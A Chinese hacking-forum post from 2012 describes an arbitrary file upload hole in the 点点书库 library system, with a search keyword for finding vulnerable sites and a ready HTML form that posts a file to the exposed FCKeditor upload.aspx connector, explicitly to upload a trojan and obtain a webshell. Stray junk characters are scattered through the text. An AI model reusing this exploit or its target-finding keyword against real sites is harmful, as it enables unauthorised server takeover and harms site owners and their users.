主题:图书馆系统任意文件上传漏洞% J8 J- S# r4 ]& t" N/ s& V
作者:冰锋刺客2 Y' _: {( E) G6 Z
厂商:点击书(dianjishu.com)- k: U/ ]# _" A% M
日期:2012-6-21
8 F1 W4 U4 b& F, r& e$ X# ]
! W; H) t! ]7 w- t9 s$ L; pI 概述4 E% [8 L% H. c4 K- s- m
点点书库图书馆系统存在文件上传漏洞,导致可以直接拿webshell: C1 ~! u0 V9 D M7 h$ Q
II 简介
2 s3 [# J- D4 t- @# E 关键词:"Copyright (C) 点点电子书库 2009-2010, All Rights Reserved"3 w7 f5 i# F# X& M
补充一个漏洞
$ d; T. _9 d; Q' A* e <form id="frmUpload" enctype="multipart/form-data"
9 t8 b7 g$ j1 b1 I action="http://url/admin/js/fckeditor/editor/filemanager/connectors/aspx/upload.aspx?Type=Media" method="post">请上传您的马子<br><input type="file" name="NewFile" size="50"><br>0 W( `% w% B: w- L- J
<input id="btnUpload" type="submit" value="操翻他">
/ u) l$ ^1 b# B3 P1 ?1 S </form>1 S0 y4 z* j9 _: \" Z5 v- A/ j
你们懂的: t- _4 C Z0 Y
那傻逼提供还需要改包.
/ {8 T9 X. u& R4 _ ] 自己看了下源代码发现fckeditor( X( |* ?# f% Z; S" c) Z ?
直接秒杀
" w* C- E% {! t8 ~( j: f |
发表于 2012-9-10 21:20:59
收藏
支持
反对